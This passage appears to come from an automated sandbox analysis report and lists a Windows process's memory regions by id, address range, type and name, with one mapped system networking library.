start_va = 0x7200000 end_va = 0x72fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007200000" filename = "" Region: id = 868 start_va = 0x7300000 end_va = 0x733ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007300000" filename = "" Region: id = 869 start_va = 0x7340000 end_va = 0x743ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007340000" filename = "" Region: id = 870 start_va = 0x7440000 end_va = 0x747ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007440000" filename = "" Region: id = 871 start_va = 0x7480000 end_va = 0x757ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007480000" filename = "" Region: id = 872 start_va = 0x7580000 end_va = 0x75bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007580000" filename = "" Region: id = 873 start_va = 0x75c0000 end_va = 0x76bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000075c0000" filename = "" Region: id = 874 start_va = 0x76c0000 end_va = 0x76fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000076c0000" filename = "" Region: id = 875 start_va = 0x7700000 end_va = 0x77fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007700000" filename = "" Region: id = 876 start_va = 0x7800000 end_va = 0x783ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007800000" filename = "" Region: id = 877 start_va = 0x7840000 end_va = 0x793ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007840000" filename = "" Region: id = 878 start_va = 0x7940000 end_va = 0x797ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007940000" filename = "" Region: id = 879 start_va = 0x7980000 end_va = 0x7a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007980000" filename = "" Region: id = 880 start_va = 0x7a80000 end_va = 0x7abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a80000" filename = "" Region: id = 881 start_va = 0x7ac0000 end_va = 0x7bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ac0000" filename = "" Region: id = 882 start_va = 0x7bc0000 end_va = 0x7bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007bc0000" filename = "" Region: id = 883 start_va = 0x7c00000 end_va = 0x7cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c00000" filename = "" Region: id = 884 start_va = 0x7d00000 end_va = 0x7d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d00000" filename = "" Region: id = 885 start_va = 0x7d40000 end_va = 0x7e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d40000" filename = "" Region: id = 886 start_va = 0x7e40000 end_va = 0x7e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e40000" filename = "" Region: id = 887 start_va = 0x7e80000 end_va = 0x7f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e80000" filename = "" Region: id = 888 start_va = 0x7f80000 end_va = 0x7fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f80000" filename = "" Region: id = 889 start_va = 0x7fc0000 end_va = 0x80bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007fc0000" filename = "" Region: id = 890 start_va = 0x80c0000 end_va = 0x80fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000080c0000" filename = "" Region: id = 891 start_va = 0x8100000 end_va = 0x81fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008100000" filename = "" Region: id = 892 start_va = 0x8200000 end_va = 0x823ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008200000" filename = "" Region: id = 893 start_va = 0x8240000 end_va = 0x833ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008240000" filename = "" Region: id = 894 start_va = 0x8340000 end_va = 0x837ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008340000" filename = "" Region: id = 895 start_va = 0x8380000 end_va = 0x847ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008380000" filename = "" Region: id = 896 start_va = 0x8480000 end_va = 0x84bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008480000" filename = "" Region: id = 897 start_va = 0x84c0000 end_va = 0x85bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000084c0000" filename = "" Region: id = 898 start_va = 0x85c0000 end_va = 0x85fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085c0000" filename = "" Region: id = 899 start_va = 0x8600000 end_va = 0x86fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008600000" filename = "" Region: id = 900 start_va = 0x8700000 end_va = 0x873ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008700000" filename = "" Region: id = 901 start_va = 0x8740000 end_va = 0x883ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008740000" filename = "" Region: id = 902 start_va = 0x8840000 end_va = 0x887ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008840000" filename = "" Region: id = 903 start_va = 0x8880000 end_va = 0x897ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008880000" filename = "" Region: id = 904 start_va = 0x7eec3000 end_va = 0x7eec5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eec3000" filename = "" Region: id = 905 start_va = 0x7eec6000 end_va = 0x7eec8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eec6000" filename = "" Region: id = 906 start_va = 0x7eec9000 end_va = 0x7eecbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eec9000" filename = "" Region: id = 907 start_va = 0x7eecc000 end_va = 0x7eecefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eecc000" filename = "" Region: id = 908 start_va = 0x7eecf000 end_va = 0x7eed1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eecf000" filename = "" Region: id = 909 start_va = 0x7eed2000 end_va = 0x7eed4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eed2000" filename = "" Region: id = 910 start_va = 0x7eed5000 end_va = 0x7eed7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eed5000" filename = "" Region: id = 911 start_va = 0x7eed8000 end_va = 0x7eedafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eed8000" filename = "" Region: id = 912 start_va = 0x7eedb000 end_va = 0x7eeddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eedb000" filename = "" Region: id = 913 start_va = 0x7eede000 end_va = 0x7eee0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eede000" filename = "" Region: id = 914 start_va = 0x7eee1000 end_va = 0x7eee3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eee1000" filename = "" Region: id = 915 start_va = 0x7eee4000 end_va = 0x7eee6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eee4000" filename = "" Region: id = 916 start_va = 0x7eee7000 end_va = 0x7eee9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eee7000" filename = "" Region: id = 917 start_va = 0x7eeea000 end_va = 0x7eeecfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eeea000" filename = "" Region: id = 918 start_va = 0x7eeed000 end_va = 0x7eeeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eeed000" filename = "" Region: id = 919 start_va = 0x7eef0000 end_va = 0x7eef2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eef0000" filename = "" Region: id = 920 start_va = 0x7eef3000 end_va = 0x7eef5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eef3000" filename = "" Region: id = 921 start_va = 0x7eef6000 end_va = 0x7eef8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eef6000" filename = "" Region: id = 922 start_va = 0x7eef9000 end_va = 0x7eefbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eef9000" filename = "" Region: id = 923 start_va = 0x7eefc000 end_va = 0x7eefefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eefc000" filename = "" Region: id = 924 start_va = 0x7eeff000 end_va = 0x7ef01fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eeff000" filename = "" Region: id = 925 start_va = 0x7ef02000 end_va = 0x7ef04fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef02000" filename = "" Region: id = 926 start_va = 0x7ef05000 end_va = 0x7ef07fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef05000" filename = "" Region: id = 927 start_va = 0x7ef08000 end_va = 0x7ef0afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef08000" filename = "" Region: id = 928 start_va = 0x7ef0b000 end_va = 0x7ef0dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef0b000" filename = "" Region: id = 929 start_va = 0x7ef0e000 end_va = 0x7ef10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef0e000" filename = "" Region: id = 930 start_va = 0x7ef11000 end_va = 0x7ef13fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef11000" filename = "" Region: id = 931 start_va = 0x7ef14000 end_va = 0x7ef16fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef14000" filename = "" Region: id = 932 start_va = 0x7ef17000 end_va = 0x7ef19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef17000" filename = "" Region: id = 933 start_va = 0x7ef1a000 end_va = 0x7ef1cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef1a000" filename = "" Region: id = 934 start_va = 0x7ef1d000 end_va = 0x7ef1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef1d000" filename = "" Region: id = 935 start_va = 0x7ef20000 end_va = 0x7ef22fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef20000" filename = "" Region: id = 936 start_va = 0x7ef23000 end_va = 0x7ef25fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef23000" filename = "" Region: id = 937 start_va = 0x7ef26000 end_va = 0x7ef28fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef26000" filename = "" Region: id = 938 start_va = 0x7ef29000 end_va = 0x7ef2bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef29000" filename = "" Region: id = 939 start_va = 0x7ef2c000 end_va = 0x7ef2efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef2c000" filename = "" Region: id = 940 start_va = 0x7ef2f000 end_va = 0x7ef31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef2f000" filename = "" Region: id = 941 start_va = 0x8980000 end_va = 0x898ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008980000" filename = "" Region: id = 942 start_va = 0x8990000 end_va = 0x8994fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008990000" filename = "" Region: id = 943 start_va = 0x8980000 end_va = 0x8984fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008980000" filename = "" Region: id = 944 start_va = 0x8980000 end_va = 0x8984fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008980000" filename = "" Region: id = 945 start_va = 0x8980000 end_va = 0x8984fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008980000" filename = "" Region: id = 946 start_va = 0x8980000 end_va = 0x8984fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008980000" filename = "" Region: id = 947 start_va = 0x8980000 end_va = 0x8984fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008980000" filename = "" Region: id = 948 start_va = 0x8980000 end_va = 0x8984fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008980000" filename = "" Region: id = 949 start_va = 0x8980000 end_va = 0x8984fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008980000" filename = "" Region: id = 950 start_va = 0x8980000 end_va = 0x8984fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008980000" filename = "" Region: id = 951 start_va = 0x8980000 end_va = 0x8984fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008980000" filename = "" Region: id = 952 start_va = 0x8980000 end_va = 0x8984fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008980000" filename = "" Region: id = 953 start_va = 0x8980000 end_va = 0x8984fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008980000" filename = "" Region: id = 954 start_va = 0x8980000 end_va = 0x8984fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008980000" filename = "" Region: id = 955 start_va = 0x8980000 end_va = 0x8984fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008980000" filename = "" Region: id = 956 start_va = 0x8980000 end_va = 0x8984fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008980000" filename = "" Region: id = 957 start_va = 0x8980000 end_va = 0x8984fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008980000" filename = "" Region: id = 958 start_va = 0x8980000 end_va = 0x8984fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008980000" filename = "" Region: id = 959 start_va = 0x8980000 end_va = 0x8984fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008980000" filename = "" Region: id = 960 start_va = 0x8980000 end_va = 0x8b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008980000" filename = "" Region: id = 961 start_va = 0x74c30000 end_va = 0x74c34fff monitored = 0 entry_point = 0x74c315df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 962 start_va = 0x8980000 end_va = 0x89bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008980000" filename = "" Region: id = 963 start_va = 0x89c0000 end_va = 0x8abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089c0000" filename = "" Region: id = 964 start_va = 0x8ac0000 end_va = 0x8afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ac0000" filename = "" Region: id = 965 start_va = 0x8b10000 end_va = 0x8b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b10000" filename = "" Region: id = 966 start_va = 0x8b50000 end_va = 0x8c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b50000" filename = "" Region: id = 967 start_va = 0x8c50000 end_va = 0x8c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c50000" filename = "" Region: id = 968 start_va = 0x8c90000 end_va = 0x8d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c90000" filename = "" Region: id = 969 start_va = 0x8d90000 end_va = 0x8dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d90000" filename = "" Region: id = 970 start_va = 0x8dd0000 end_va = 0x8ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008dd0000" filename = "" Region: id = 971 start_va = 0x8ed0000 end_va = 0x8f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ed0000" filename = "" Region: id = 972 start_va = 0x8f10000 end_va = 0x900ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f10000" filename = "" Region: id = 973 start_va = 0x9010000 end_va = 0x904ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009010000" filename = "" Region: id = 974 start_va = 0x9050000 end_va = 0x914ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009050000" filename = "" Region: id = 975 start_va = 0x9150000 end_va = 0x918ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009150000" filename = "" Region: id = 976 start_va = 0x9190000 end_va = 0x928ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009190000" filename = "" Region: id = 977 start_va = 0x9290000 end_va = 0x92cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009290000" filename = "" Region: id = 978 start_va = 0x92d0000 end_va = 0x93cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000092d0000" filename = "" Region: id = 979 start_va = 0x93d0000 end_va = 0x940ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000093d0000" filename = "" Region: id = 980 start_va = 0x9410000 end_va = 0x950ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009410000" filename = "" Region: id = 981 start_va = 0x9510000 end_va = 0x954ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009510000" filename = "" Region: id = 982 start_va = 0x9550000 end_va = 0x964ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009550000" filename = "" Region: id = 983 start_va = 0x9650000 end_va = 0x968ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009650000" filename = "" Region: id = 984 start_va = 0x9690000 end_va = 0x978ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009690000" filename = "" Region: id = 985 start_va = 0x9790000 end_va = 0x97cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009790000" filename = "" Region: id = 986 start_va = 0x97d0000 end_va = 0x98cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000097d0000" filename = "" Region: id = 987 start_va = 0x98d0000 end_va = 0x990ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000098d0000" filename = "" Region: id = 988 start_va = 0x9910000 end_va = 0x9a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009910000" filename = "" Region: id = 989 start_va = 0x9a10000 end_va = 0x9a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a10000" filename = "" Region: id = 990 start_va = 0x9a50000 end_va = 0x9b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a50000" filename = "" Region: id = 991 start_va = 0x9b50000 end_va = 0x9b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b50000" filename = "" Region: id = 992 start_va = 0x9b90000 end_va = 0x9c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b90000" filename = "" Region: id = 993 start_va = 0x9c90000 end_va = 0x9ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c90000" filename = "" Region: id = 994 start_va = 0x9cd0000 end_va = 0x9dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009cd0000" filename = "" Region: id = 995 start_va = 0x9dd0000 end_va = 0x9e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009dd0000" filename = "" Region: id = 996 start_va = 0x9e10000 end_va = 0x9f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e10000" filename = "" Region: id = 997 start_va = 0x9f10000 end_va = 0x9f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f10000" filename = "" Region: id = 998 start_va = 0x9f50000 end_va = 0xa04ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f50000" filename = "" Region: id = 999 start_va = 0xa050000 end_va = 0xa08ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a050000" filename = "" Region: id = 1000 start_va = 0xa090000 end_va = 0xa18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a090000" filename = "" Region: id = 1001 start_va = 0xa190000 end_va = 0xa1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a190000" filename = "" Region: id = 1002 start_va = 0xa1d0000 end_va = 0xa2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a1d0000" filename = "" Region: id = 1003 start_va = 0xa2d0000 end_va = 0xa30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a2d0000" filename = "" Region: id = 1004 start_va = 0xa310000 end_va = 0xa40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a310000" filename = "" Region: id = 1005 start_va = 0xa410000 end_va = 0xa44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a410000" filename = "" Region: id = 1006 start_va = 0xa450000 end_va = 0xa54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a450000" filename = "" Region: id = 1007 start_va = 0xa550000 end_va = 0xa58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a550000" filename = "" Region: id = 1008 start_va = 0xa590000 end_va = 0xa68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a590000" filename = "" Region: id = 1009 start_va = 0xa690000 end_va = 0xa6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a690000" filename = "" Region: id = 1010 start_va = 0xa6d0000 end_va = 0xa7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a6d0000" filename = "" Region: id = 1011 start_va = 0xa7d0000 end_va = 0xa80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a7d0000" filename = "" Region: id = 1012 start_va = 0xa810000 end_va = 0xa90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a810000" filename = "" Region: id = 1013 start_va = 0xa910000 end_va = 0xa94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a910000" filename = "" Region: id = 1014 start_va = 0xa950000 end_va = 0xaa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a950000" filename = "" Region: id = 1015 start_va = 0xaa50000 end_va = 0xaa8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000aa50000" filename = "" Region: id = 1016 start_va = 0xaa90000 end_va = 0xab8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000aa90000" filename = "" Region: id = 1017 start_va = 0xab90000 end_va = 0xabcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ab90000" filename = "" Region: id = 1018 start_va = 0xabd0000 end_va = 0xaccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000abd0000" filename = "" Region: id = 1019 start_va = 0xacd0000 end_va = 0xad0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000acd0000" filename = "" Region: id = 1020 start_va = 0xad10000 end_va = 0xae0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ad10000" filename = "" Region: id = 1021 start_va = 0xae10000 end_va = 0xae4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ae10000" filename = "" Region: id = 1022 start_va = 0xae50000 end_va = 0xaf4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ae50000" filename = "" Region: id = 1023 start_va = 0xaf50000 end_va = 0xaf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af50000" filename = "" Region: id = 1024 start_va = 0xaf90000 end_va = 0xb08ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af90000" filename = "" Region: id = 1025 start_va = 0xb090000 end_va = 0xb0cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b090000" filename = "" Region: id = 1026 start_va = 0xb0d0000 end_va = 0xb1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b0d0000" filename = "" Region: id = 1027 start_va = 0xb1d0000 end_va = 0xb20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1d0000" filename = "" Region: id = 1028 start_va = 0xb210000 end_va = 0xb30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b210000" filename = "" Region: id = 1029 start_va = 0xb310000 end_va = 0xb34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b310000" filename = "" Region: id = 1030 start_va = 0xb350000 end_va = 0xb44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b350000" filename = "" Region: id = 1031 start_va = 0xb450000 end_va = 0xb48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b450000" filename = "" Region: id = 1032 start_va = 0xb490000 end_va = 0xb58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b490000" filename = "" Region: id = 1033 start_va = 0xb590000 end_va = 0xb5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b590000" filename = "" Region: id = 1034 start_va = 0xb5d0000 end_va = 0xb6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5d0000" filename = "" Region: id = 1035 start_va = 0xb6d0000 end_va = 0xb70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6d0000" filename = "" Region: id = 1036 start_va = 0xb710000 end_va = 0xb80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b710000" filename = "" Region: id = 1037 start_va = 0xb810000 end_va = 0xb84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b810000" filename = "" Region: id = 1038 start_va = 0xb850000 end_va = 0xb94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b850000" filename = "" Region: id = 1039 start_va = 0xb950000 end_va = 0xb98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b950000" filename = "" Region: id = 1040 start_va = 0xb990000 end_va = 0xba8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b990000" filename = "" Region: id = 1041 start_va = 0xba90000 end_va = 0xbacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ba90000" filename = "" Region: id = 1042 start_va = 0xbad0000 end_va = 0xbbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bad0000" filename = "" Region: id = 1043 start_va = 0xbbd0000 end_va = 0xbc0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bbd0000" filename = "" Region: id = 1044 start_va = 0xbc10000 end_va = 0xbd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bc10000" filename = "" Region: id = 1045 start_va = 0x7ee48000 end_va = 0x7ee4afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee48000" filename = "" Region: id = 1046 start_va = 0x7ee4b000 end_va = 0x7ee4dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee4b000" filename = "" Region: id = 1047 start_va = 0x7ee4e000 end_va = 0x7ee50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee4e000" filename = "" Region: id = 1048 start_va = 0x7ee51000 end_va = 0x7ee53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee51000" filename = "" Region: id = 1049 start_va = 0x7ee54000 end_va = 0x7ee56fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee54000" filename = "" Region: id = 1050 start_va = 0x7ee57000 end_va = 0x7ee59fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee57000" filename = "" Region: id = 1051 start_va = 0x7ee5a000 end_va = 0x7ee5cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee5a000" filename = "" Region: id = 1052 start_va = 0x7ee5d000 end_va = 0x7ee5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee5d000" filename = "" Region: id = 1053 start_va = 0x7ee60000 end_va = 0x7ee62fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee60000" filename = "" Region: id = 1054 start_va = 0x7ee63000 end_va = 0x7ee65fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee63000" filename = "" Region: id = 1055 start_va = 0x7ee66000 end_va = 0x7ee68fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee66000" filename = "" Region: id = 1056 start_va = 0x7ee69000 end_va = 0x7ee6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee69000" filename = "" Region: id = 1057 start_va = 0x7ee6c000 end_va = 0x7ee6efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee6c000" filename = "" Region: id = 1058 start_va = 0x7ee6f000 end_va = 0x7ee71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee6f000" filename = "" Region: id = 1059 start_va = 0x7ee72000 end_va = 0x7ee74fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee72000" filename = "" Region: id = 1060 start_va = 0x7ee75000 end_va = 0x7ee77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee75000" filename = "" Region: id = 1061 start_va = 0x7ee78000 end_va = 0x7ee7afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee78000" filename = "" Region: id = 1062 start_va = 0x7ee7b000 end_va = 0x7ee7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee7b000" filename = "" Region: id = 1063 start_va = 0x7ee7e000 end_va = 0x7ee80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee7e000" filename = "" Region: id = 1064 start_va = 0x7ee81000 end_va = 0x7ee83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee81000" filename = "" Region: id = 1065 start_va = 0x7ee84000 end_va = 0x7ee86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ee84000" filename = "" Region: id = 1066 start_va = 